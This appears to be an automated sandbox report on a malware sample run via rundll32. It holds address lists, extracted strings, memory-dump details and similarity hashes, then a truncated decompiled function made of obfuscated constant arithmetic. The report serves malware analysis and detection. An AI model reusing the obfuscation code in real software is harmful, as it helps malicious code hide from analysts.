0x001fdfba
0x001fdfc5
0x001fdfd0
0x001fdfdb
0x001fdfe6
0x001fdff1
0x001fdffc
0x001fe007
0x001fe00f
0x001fe01a
0x001fe025
0x001fe035
0x001fe038
0x001fe03b
0x001fe042
0x001fe04d
0x001fe063
0x001fe06a
0x001fe075
0x001fe07d
0x001fe085
0x001fe08a
0x001fe092
0x001fe09a
0x001fe0a2
0x001fe0a7
0x001fe0ac
0x001fe0b1
0x001fe0b9
0x001fe0c1
0x001fe0c6
0x001fe0cb
0x001fe0d3
0x001fe0db
0x001fe0e3
0x001fe0f3
0x001fe0fb
0x001fe0fe
0x001fe104
0x001fe10c
0x001fe117
0x001fe11f
0x001fe12a
0x001fe135
0x001fe13d
0x001fe148
0x001fe150
0x001fe15e
0x001fe163
0x001fe16e
0x001fe171
0x001fe175
0x001fe17d
0x001fe188
0x001fe193
0x001fe19e
0x001fe1a9
0x001fe1b4
0x001fe1bc
0x001fe1c4
0x001fe1cf
0x001fe1da
0x001fe1e5
0x001fe1f0
0x001fe1fb
0x001fe211
0x001fe218
0x001fe223
0x001fe22a
0x001fe235
0x001fe240
0x001fe24b
0x001fe256
0x001fe261
0x001fe274
0x001fe275
0x001fe27c
0x001fe284
0x001fe28f
0x001fe29a
0x001fe2ae
0x001fe2bd
0x001fe2c4
0x001fe2cf
0x001fe2da
0x001fe2e2
0x001fe2ed
0x001fe2f8
0x001fe303
0x001fe30e
0x001fe319
0x001fe324
0x001fe32f
0x001fe337
0x001fe33f
0x001fe349
0x001fe34d
0x001fe355
0x001fe35d
0x001fe365
0x001fe369
0x001fe371
0x001fe379
0x001fe38f
0x001fe394
0x001fe39b
0x001fe3a6
0x001fe3b1
0x001fe3c1
0x001fe3c7
0x001fe3cf
0x001fe3d7
0x001fe3df
0x001fe3ea
0x001fe3f5
0x001fe400
0x001fe412
0x001fe417
0x001fe420
0x001fe42b
0x001fe43e
0x001fe441
0x001fe442
0x001fe449
0x001fe454
0x001fe45c
0x001fe467
0x001fe472
0x001fe47d
0x001fe488
0x001fe493
0x001fe49e
0x001fe4a9
0x001fe4b4
0x001fe4bf
0x001fe4c7
0x001fe4d2
0x001fe4dd
0x001fe4e8
0x001fe4f0
0x001fe4fb
0x001fe503
0x001fe50b
0x001fe510
0x001fe518
0x001fe520
0x001fe52b
0x001fe536
0x001fe541
0x001fe54c
0x001fe557
0x001fe562
0x001fe56d
0x001fe578
0x001fe58b
0x001fe592
0x001fe59d
0x001fe5b3
0x001fe5c2
0x001fe5c9
0x001fe5d4
0x001fe5e8
0x001fe5f1
0x001fe5fc
0x001fe604
0x001fe60f
0x001fe617
0x001fe61f
0x001fe627
0x001fe62f
0x001fe637
0x001fe64b
0x001fe650
0x001fe662
0x001fe669
0x001fe674
0x001fe688
0x001fe68d
0x001fe694
0x001fe69f
0x001fe6b4
0x001fe6b7
0x001fe6b8
0x001fe6bf
0x001fe6ca
0x001fe6d5
0x001fe6e0
0x001fe6eb
0x001fe701
0x001fe708
0x001fe713
0x001fe71b
0x001fe723
0x001fe730
0x001fe734
0x001fe73c
0x001fe747
0x001fe752
0x001fe762
0x001fe769
0x001fe774
0x001fe77f
0x001fe787
0x001fe792
0x001fe79d
0x001fe7a8
0x001fe7b3
0x001fe7be
0x001fe7c9
0x001fe7da
0x001fe7e1
0x001fe7ec
0x001fe7ff
0x001fe806
0x001fe811
0x001fe824
0x001fe82b
0x001fe838
0x001fe84c
0x001fe851
0x001fe85a
0x001fe861
0x001fe869
0x001fe874
0x001fe886
0x001fe88b
0x001fe894
0x001fe89f
0x001fe8aa
0x001fe8b5
0x001fe8c0
0x001fe8cb
0x001fe8d6
0x001fe8de
0x001fe8e6
0x001fe8f1
0x001fe904
0x001fe905
0x001fe914
0x001fe91b
0x001fe926
0x001fe931
0x001fe939
0x001fe941
0x001fe94c
0x001fe957
0x001fe95f
0x001fe96a
0x001fe975
0x001fe97d
0x001fe985
0x001fe98a
0x001fe992
0x001fe99a
0x001fe9a5
0x001fe9ad
0x001fe9b8
0x001fe9c0
0x001fe9c8
0x001fe9d2
0x001fe9d6
0x001fe9de
0x001fe9e9
0x001fe9f0
0x001fe9fb
0x001fea06
0x001fea0e
0x001fea16
0x001fea24
0x001fea28
0x001fea30
0x001fea3b
0x001fea4e
0x001fea55
0x001fea5d
0x001fea68
0x001fea73
0x001fea7e
0x001fea89
0x001fea94
0x001fea9f
0x001feaaa
0x001feab7
0x001feabf
0x001feace
0x001fead1
0x001fead5
0x001feada
0x001feae2
0x001feaed
0x001feaf5
0x001feb07
0x001feb0e
0x001feb19
0x001feb24
0x001feb2f
0x001feb3a
0x001feb45
0x001feb4c
0x001feb57
0x001feb62
0x001feb6d
0x001feb78
0x001feb83
0x001feb8b
0x001feb90
0x001feb98
0x001feba0
0x001feba8
0x001febb0
0x001febbd
0x001febbe
0x001febc2
0x001febca
0x001febd2
0x001febda
0x001febe2
0x001febea
0x001febf2
0x001febfa
0x001fec05
0x001fec10
0x001fec1b
0x001fec26
0x001fec2e
0x001fec33
0x001fec41
0x001fec45
0x001fec4d
0x001fec58
0x001fec60
0x001fec6b
0x001fec76
0x001fec7e
0x001fec89
0x001fec94
0x001fec9f
0x001fecaa
0x001fecb5
0x001fecc0
0x001fecc8
0x001fecd3
0x001fecde
0x001fece9
0x001fecf4
0x001fecff
0x001fed0a
0x001fed15
0x001fed1d
0x001fed28
0x001fed30
0x001fed3d
0x001fed43
0x001fed50
0x001fed58
0x001fed6c
0x001fed78
0x001fed7f
0x001fed8a
0x001fed95
0x001feda0
0x001feda8
0x001fedbd
0x001fedbe
0x001fedc5
0x001fedd0
0x001fedd8
0x001fede0
0x001fede8
0x001fedf0
0x001fedf8
0x001fee15
0x001fee1c
0x001fee27
0x001fee3a
0x001fee41
0x001fee4c
0x001fee57
0x001fee5f
0x001fee6a
0x001fee72
0x001fee82
0x001fee86
0x001fee8e
0x001fee96
0x001feea1
0x001feeac
0x001feeb7
0x001feec2
0x001feecd
0x001feed8
0x001feee0
0x001feeeb
0x001feef3
0x001feefb
0x001fef00
0x001fef05
0x001fef0d
0x001fef18
0x001fef23
0x001fef2b
0x001fef36
0x001fef41
0x001fef49
0x001fef51
0x001fef5c
0x001fef5c
0x001fef5c
0x001fef61
0x001fef61
0x001fef61
0x001fef61
0x001fef63
0x00000000
0x00000000
0x001fef69
0x001ff34e
0x001ff361
0x001ff368
0x001ff370
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001fef6f
0x001fef75
0x001ff18e
0x001ff190
0x001ff27e
0x001ff284
0x001ff32c
0x001ff331
0x001ff333
0x001ff80b
0x001ff812
0x001ff812
0x001ff339
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff28a
0x001ff290
0x001ff30e
0x001ff314
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff292
0x001ff298
0x001ff2ea
0x001ff2ef
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff29a
0x001ff2a0
0x00000000
0x00000000
0x001ff2c3
0x001ff2cb
0x001ff2cc
0x001ff2d4
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff196
0x001ff7f1
0x00000000
0x001ff7f1
0x001ff19c
0x001ff1a2
0x001ff26c
0x001ff271
0x001ff274
0x001ff274
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff1a8
0x001ff1ae
0x001ff232
0x001ff239
0x001ff241
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff1b0
0x001ff1b6
0x001ff1fd
0x001ff202
0x001ff204
0x00000000
0x00000000
0x001ff215
0x001ff21a
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff1b8
0x001ff1be
0x00000000
0x00000000
0x001ff1e4
0x001ff1e9
0x001ff1ec
0x001ff1ec
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001fef7b
0x001ff184
0x00000000
0x001ff184
0x001fef81
0x001fef87
0x001ff0f6
0x001ff0fc
0x001ff173
0x001ff17a
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff0fe
0x001ff104
0x001ff151
0x001ff156
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff106
0x001ff10c
0x001ff13e
0x001ff143
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff10e
0x001ff114
0x00000000
0x00000000
0x001ff126
0x001ff12d
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001fef8d
0x001ff0ae
0x001ff0b3
0x001ff0b6
0x001ff0b8
0x001ff677
0x001ff677
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff0c9
0x001ff0ce
0x001ff0d6
0x001ff0db
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff0e1
0x001ff0e9
0x001ff0ee
0x00000000
0x001ff0ee
0x001fef99
0x001ff073
0x001ff078
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001fefa5
0x001ff057
0x001ff05e
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001fefb1
0x001ff7e3
0x00000000
0x001ff7e3
0x001fefbd
0x001ff03d
0x001ff044
0x001ff046
0x001fefff
0x001fefff
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001fefc5
0x00000000
0x00000000
0x001fefe0
0x001ff015
0x001ff01c
0x001ff024
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001feff0
0x001feff7
0x001feff9
0x00000000
0x001feff9
0x001ff37b
0x001ff381
0x001ff5e9
0x001ff5ef
0x001ff6ae
0x001ff6b4
0x001ff7b5
0x001ff7ba
0x001ff7bd
0x001ff7c2
0x001ff7c2
0x00000000
0x001ff7c2
0x001ff6ba
0x001ff6c0
0x001ff72d
0x001ff73b
0x001ff758
0x001ff780
0x001ff785
0x001ff788
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff6c2
0x001ff6c4
0x001ff70d
0x001ff712
0x001ff715
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff6c6
0x001ff6cc
0x00000000
0x00000000
0x001ff6da
0x001ff6df
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff5f5
0x001ff69d
0x001ff6a2
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff5fb
0x001ff601
0x001ff688
0x001ff68a
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff603
0x001ff609
0x001ff667
0x001ff66d
0x001ff66f
0x001ff66f
0x00000000
0x001ff66f
0x001ff60b
0x001ff611
0x001ff643
0x001ff648
0x001ff64b
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff613
0x001ff619
0x00000000
0x00000000
0x001ff61f
0x00000000
0x001ff61f
0x001ff387
0x001ff5df
0x00000000
0x001ff5df
0x001ff38d
0x001ff393
0x001ff547
0x001ff54d
0x001ff806
0x00000000
0x001ff806
0x001ff553
0x001ff559
0x001ff5d0
0x001ff5d5
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff55b
0x001ff561
0x001ff5ac
0x001ff5b9
0x001ff5be
0x00000000
0x001ff5c1
0x001ff563
0x001ff569
0x00000000
0x00000000
0x001ff57d
0x001ff582
0x001ff584
0x00000000
0x00000000
0x001ff58a
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff399
0x001ff538
0x001ff53d
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff39f
0x001ff3a5
0x001ff51e
0x001ff523
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff3ab
0x001ff3b1
0x001ff45a
0x001ff465
0x001ff473
0x001ff47a
0x001ff482
0x001ff483
0x001ff488
0x001ff48b
0x001ff48d
0x001ff4d5
0x001ff4e1
0x001ff4f8
0x001ff508
0x001ff50d
0x001ff510
0x00000000
0x001ff510
0x001ff496
0x001ff4ad
0x001ff4ba
0x001ff4bf
0x001ff4c2
0x001ff4c4
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff3b7
0x001ff3bd
0x001ff419
0x001ff41e
0x001ff421
0x001ff423
0x001ff3ec
0x001ff3ec
0x001fef5c
0x001fef5c
0x001fef5c
0x00000000
0x001fef5c
0x001fef5c
0x001ff43c
0x001ff449
0x001ff450
0x00000000
0x001ff450
0x001ff3bf
0x001ff3c5
0x00000000
0x00000000
0x001ff3df
0x001ff3e0
0x001ff3e1
0x001ff3e8
0x001ff3ea
0x001ff3f6
0x00000000
0x001ff3f6
0x00000000
0x001ff7c7
0x001ff7c7
0x001ff7c7
0x00000000
0x001ff7d3

Strings

ly, xrefs: 001FE01A
q2, xrefs: 001FEE5F
lK, xrefs: 001FED95
y?, xrefs: 001FE104
2N, xrefs: 001FED7F
(1, xrefs: 001FE13D
{, xrefs: 001FDDF9
o, xrefs: 001FDE22
0G, xrefs: 001FEDF8
}L, xrefs: 001FDD0A
#x, xrefs: 001FE303
4, xrefs: 001FDC5F
}o, xrefs: 001FE8F1
, xrefs: 001FEA89
s4, xrefs: 001FDDA1
5h, xrefs: 001FEEEB
T5, xrefs: 001FE520
]1, xrefs: 001FE2E2
EA, xrefs: 001FDE9C
X, xrefs: 001FE29A
B, xrefs: 001FDF50
Ue., xrefs: 001FE806
;l, xrefs: 001FE3DF
@P, xrefs: 001FE708
b), xrefs: 001FE60F
N, xrefs: 001FE7BE
g@, xrefs: 001FE669
mU, xrefs: 001FE811
6N, xrefs: 001FED1D
v^, xrefs: 001FE9DE
~|, xrefs: 001FE894
_, xrefs: 001FE941
j:, xrefs: 001FEF0D
Lw, xrefs: 001FE261

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $#x$(1$0G$2N$5h$6N$;l$@P$B$EA$Lw$N$T5$Ue.$X$]1$b)$g@$j:$lK$ly$mU$o$q2$s4$v^$y?${$}L$}o$~|$4$_
API String ID: 0-2583851105
Opcode ID: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
Instruction ID: bba1c54af908dda9755717f590e47afcc084a3b15f8f9bb4adc035fb5e6a129b
Opcode Fuzzy Hash: abf9190a5ddaddb15da951abeef27d0c74c7bb0a7871e85bd9f0843ae82e2e6e
Instruction Fuzzy Hash: 87D2F3715093858BE378CF25C58A7EFBBE1BBD5304F10891DE29A862A0DBB58549CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029D1A3, Relevance: 43.6, Strings: 34, Instructions: 1094COMMON

Download Yara Rule

Strings

#x, xrefs: 0029D877
mU, xrefs: 0029DD85
Lw, xrefs: 0029D7D5
ly, xrefs: 0029D58E
lK, xrefs: 0029E309
N, xrefs: 0029DD32
{, xrefs: 0029D36D
2N, xrefs: 0029E2F3
s4, xrefs: 0029D315
(1, xrefs: 0029D6B1
v^, xrefs: 0029DF52
_, xrefs: 0029DEB5
~|, xrefs: 0029DE08
EA, xrefs: 0029D410
g@, xrefs: 0029DBDD
q2, xrefs: 0029E3D3
B, xrefs: 0029D4C4
5h, xrefs: 0029E45F
@P, xrefs: 0029DC7C
]1, xrefs: 0029D856
0G, xrefs: 0029E36C
j:, xrefs: 0029E481
Ue., xrefs: 0029DD7A
6N, xrefs: 0029E291
}o, xrefs: 0029DE65
;l, xrefs: 0029D953
b), xrefs: 0029DB83
}L, xrefs: 0029D27E
o, xrefs: 0029D396
T5, xrefs: 0029DA94
4, xrefs: 0029D1D3
X, xrefs: 0029D80E
y?, xrefs: 0029D678
, xrefs: 0029DFFD

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $#x$(1$0G$2N$5h$6N$;l$@P$B$EA$Lw$N$T5$Ue.$X$]1$b)$g@$j:$lK$ly$mU$o$q2$s4$v^$y?${$}L$}o$~|$4$_
API String ID: 0-2583851105
Opcode ID: 060615aa69f715a21d01a13718be8fa87a291dc1bd173b3c375712ab979affb1
Instruction ID: 57329163069e33eb9df58fda4e02e44dd1e5861c692850a6f9992c84aa74484c
Opcode Fuzzy Hash: 060615aa69f715a21d01a13718be8fa87a291dc1bd173b3c375712ab979affb1
Instruction Fuzzy Hash: 8BD212711193818BE778CF25C58ABDFBBE1BBC5308F10891DE18A862A0DBB59559CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001FADCE, Relevance: 31.9, Strings: 25, Instructions: 696
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E001FADCE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, signed int _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr* _v340;
				intOrPtr* _v344;
				void* _t776;
				intOrPtr* _t779;
				intOrPtr* _t782;
				intOrPtr* _t794;
				intOrPtr _t799;
				intOrPtr _t800;
				void* _t806;
				void* _t808;
				intOrPtr _t810;
				intOrPtr* _t811;
				intOrPtr* _t815;
				signed int _t824;
				void* _t833;
				signed int _t834;
				void* _t876;
				intOrPtr _t879;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t911;
				intOrPtr* _t917;
				void* _t919;
				void* _t921;
				void* _t923;

				_t815 = _a24;
				_push(_a40);
				_push(_a36 & 0x0000ffff);
				_push(_a32);
				_push(_a28);
				_push(_t815);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_a36 & 0x0000ffff);
				_v16 = 0x698fe5;
				_v4 = 0;
				_t817 = 0;
				_v20 = 0;
				_t917 = 0;
				_v12 = 0x6421c2;
				_t919 =  &_v344 + 0x30;
				_v8 = 0x4b39f;
				_v116 = 0xe145;
				_t911 = 0x2a775466;
				_v32 = 0;
				_t892 = 0x2c;
				_v344 = 0;
				_v116 = _v116 * 0x68;
				_v116 = _v116 ^ 0x005b8408;
				_v252 = 0x1a30;
				_v252 = _v252 | 0xfbfb3abf;
				_v252 = _v252 ^ 0xfbfb3aac;
				_v308 = 0xd892;
				_v308 = _v308 | 0x24cee9b5;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x3a963db2;
				_v308 = _v308 ^ 0x84fbfd7a;
				_v144 = 0xe41e;
				_v144 = _v144 ^ 0xfb5a10bc;
				_v144 = _v144 >> 2;
				_v144 = _v144 ^ 0x3ed63d28;
				_v292 = 0xf2f6;
				_v292 = _v292 + 0xffff8fc8;
				_v292 = _v292 / _t892;
				_v292 = _v292 + 0x4f67;
				_v292 = _v292 ^ 0x0000125f;
				_v44 = 0x5769;
				_v44 = _v44 + 0x7821;
				_v44 = _v44 ^ 0x0040cf8a;
				_v208 = 0xa2da;
				_v208 = _v208 + 0xffffda26;
				_v208 = _v208 | 0x6bc8fc84;
				_v208 = _v208 ^ 0x6bccfd84;
				_v100 = 0x8619;
				_t893 = 0x6e;
				_v100 = _v100 / _t893;
				_v100 = _v100 ^ 0x04000138;
				_v236 = 0x85ca;
				_v236 = _v236 + 0xf775;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 | 0xc3010237;
				_v236 = _v236 ^ 0xc3090237;
				_v60 = 0x5f94;
				_v60 = _v60 + 0xffff918e;
				_v60 = _v60 ^ 0xfffff322;
				_v300 = 0xef4d;
				_v300 = _v300 | 0xf95e9216;
				_t894 = 0x1d;
				_v300 = _v300 * 0x78;
				_v300 = _v300 + 0xffffa6e4;
				_v300 = _v300 ^ 0xe4875a6c;
				_v176 = 0xcd87;
				_v176 = _v176 + 0xffff9544;
				_v176 = _v176 / _t894;
				_v176 = _v176 ^ 0x80000368;
				_v248 = 0xa869;
				_v248 = _v248 + 0xffff8a84;
				_v248 = _v248 | 0x3280cd8c;
				_t895 = 0x2c;
				_v248 = _v248 * 0x62;
				_v248 = _v248 ^ 0x5561f8ba;
				_v112 = 0xf823;
				_v112 = _v112 ^ 0xdc5ee9a3;
				_v112 = _v112 ^ 0xdc5e1183;
				_v284 = 0xd3bc;
				_v284 = _v284 + 0xffffd98b;
				_v284 = _v284 + 0x486f;
				_v284 = _v284 | 0x91fa5adb;
				_v284 = _v284 ^ 0x91fa81ff;
				_v220 = 0x23c4;
				_v220 = _v220 + 0x24bf;
				_v220 = _v220 >> 0xe;
				_v220 = _v220 ^ 0x0000397d;
				_v324 = 0x9c0e;
				_v324 = _v324 / _t895;
				_v324 = _v324 ^ 0x81dfe71b;
				_v324 = _v324 | 0x74c77561;
				_v324 = _v324 ^ 0xf5dfe4bc;
				_v244 = 0x9f78;
				_t896 = 0x30;
				_v244 = _v244 / _t896;
				_v244 = _v244 + 0xbc13;
				_v244 = _v244 + 0xffff658a;
				_v244 = _v244 ^ 0x00005446;
				_v276 = 0xb1b5;
				_v276 = _v276 >> 6;
				_t897 = 0x51;
				_v276 = _v276 * 0x2c;
				_v276 = _v276 ^ 0xbae7ac45;
				_v276 = _v276 ^ 0xbae7c01a;
				_v124 = 0x48e3;
				_v124 = _v124 / _t897;
				_v124 = _v124 ^ 0x0000464a;
				_v40 = 0xb973;
				_v40 = _v40 + 0x5be4;
				_v40 = _v40 ^ 0x0001169b;
				_v160 = 0x90d2;
				_v160 = _v160 ^ 0xc876beee;
				_v160 = _v160 ^ 0xab2ec0d4;
				_v160 = _v160 ^ 0x63589e4c;
				_v216 = 0xebb5;
				_v216 = _v216 + 0x1b6c;
				_v216 = _v216 + 0x5cd2;
				_v216 = _v216 ^ 0x000123a2;
				_v136 = 0xd2d;
				_v136 = _v136 ^ 0xde320a5a;
				_v136 = _v136 ^ 0xde322c98;
				_v316 = 0x9c31;
				_v316 = _v316 + 0x87ce;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x000161f3;
				_v68 = 0xaa4;
				_v68 = _v68 | 0x379a6afa;
				_v68 = _v68 ^ 0x379a4249;
				_v72 = 0x66fd;
				_v72 = _v72 ^ 0x1bf5aa39;
				_v72 = _v72 ^ 0x1bf5cfe8;
				_v240 = 0x10ca;
				_v240 = _v240 >> 2;
				_v240 = _v240 + 0x9cc9;
				_v240 = _v240 ^ 0x8ecb9aa9;
				_v240 = _v240 ^ 0x8ecb190c;
				_v80 = 0x1ce5;
				_v80 = _v80 + 0x5a3a;
				_v80 = _v80 ^ 0x000031ae;
				_v180 = 0x6dd0;
				_v180 = _v180 | 0x96bfe9d3;
				_v180 = _v180 + 0x5bad;
				_v180 = _v180 ^ 0x96c064a5;
				_v56 = 0x4ba5;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x000020d5;
				_v164 = 0xc88c;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 + 0xffffb953;
				_v164 = _v164 ^ 0xffffcdf3;
				_v172 = 0xd4f7;
				_v172 = _v172 + 0x6d56;
				_t898 = 0x71;
				_v172 = _v172 / _t898;
				_v172 = _v172 ^ 0x00007fec;
				_v64 = 0x2274;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x00042253;
				_v280 = 0xbd0e;
				_v280 = _v280 ^ 0x300005f5;
				_v280 = _v280 ^ 0x6939e5f4;
				_t899 = 0x4e;
				_v280 = _v280 * 0x37;
				_v280 = _v280 ^ 0x2b52c5dd;
				_v104 = 0xaf51;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x0057daf8;
				_v120 = 0x5a17;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x002d33fc;
				_v288 = 0x6e7b;
				_v288 = _v288 + 0xa186;
				_v288 = _v288 + 0xffffb015;
				_v288 = _v288 >> 2;
				_v288 = _v288 ^ 0x00005323;
				_v296 = 0x1ff6;
				_v296 = _v296 * 0x6d;
				_t900 = 0x76;
				_v296 = _v296 / _t899;
				_v296 = _v296 << 0xf;
				_v296 = _v296 ^ 0x1654878a;
				_v304 = 0x17a6;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 >> 0x10;
				_v304 = _v304 ^ 0x39a777a9;
				_v304 = _v304 ^ 0x39a71383;
				_v312 = 0xc1c5;
				_v312 = _v312 << 4;
				_v312 = _v312 / _t900;
				_t901 = 0x24;
				_v312 = _v312 / _t901;
				_v312 = _v312 ^ 0x000020a2;
				_v128 = 0xa7c2;
				_v128 = _v128 | 0x73e84681;
				_v128 = _v128 ^ 0x73e882e0;
				_v108 = 0xedc0;
				_v108 = _v108 + 0xffff38f3;
				_v108 = _v108 ^ 0x00004e88;
				_v268 = 0x4cb2;
				_v268 = _v268 + 0xffff581a;
				_t902 = 5;
				_v268 = _v268 * 0x7f;
				_v268 = _v268 / _t902;
				_v268 = _v268 ^ 0x332a7d68;
				_v48 = 0x3775;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x00003c2f;
				_v332 = 0x2e5;
				_v332 = _v332 + 0x973e;
				_v332 = _v332 + 0x582d;
				_v332 = _v332 | 0x4e46aea0;
				_v332 = _v332 ^ 0x4e46f01a;
				_v92 = 0xecb2;
				_v92 = _v92 >> 0x10;
				_v92 = _v92 ^ 0x00005860;
				_v192 = 0x76ab;
				_t903 = 0x58;
				_v192 = _v192 / _t903;
				_v192 = _v192 + 0xffffedde;
				_v192 = _v192 ^ 0xfffff039;
				_v168 = 0x569e;
				_v168 = _v168 | 0x8ce6da82;
				_v168 = _v168 ^ 0x7e552d9e;
				_v168 = _v168 ^ 0xf2b39afb;
				_v200 = 0x850f;
				_v200 = _v200 >> 2;
				_v200 = _v200 + 0xffffcd47;
				_v200 = _v200 ^ 0xfffff22a;
				_v336 = 0x9261;
				_v336 = _v336 << 0x10;
				_v336 = _v336 ^ 0x556f5d5a;
				_v336 = _v336 | 0x84e7afbb;
				_v336 = _v336 ^ 0xc7efb11f;
				_v260 = 0x9df0;
				_v260 = _v260 ^ 0x6037a460;
				_t904 = 0x6e;
				_v260 = _v260 / _t904;
				_t905 = 0x5d;
				_v260 = _v260 / _t905;
				_v260 = _v260 ^ 0x00026a3e;
				_v184 = 0x2584;
				_v184 = _v184 | 0x91f1cbbd;
				_v184 = _v184 + 0xffff1018;
				_v184 = _v184 ^ 0x91f0cf67;
				_v152 = 0x8ca9;
				_t906 = 0x4a;
				_v152 = _v152 / _t906;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x00006513;
				_v84 = 0x77f3;
				_v84 = _v84 + 0xffff3db1;
				_v84 = _v84 ^ 0xffffc1c9;
				_v52 = 0x587;
				_v52 = _v52 | 0x675f08fe;
				_v52 = _v52 ^ 0x675f36dd;
				_v76 = 0xbba2;
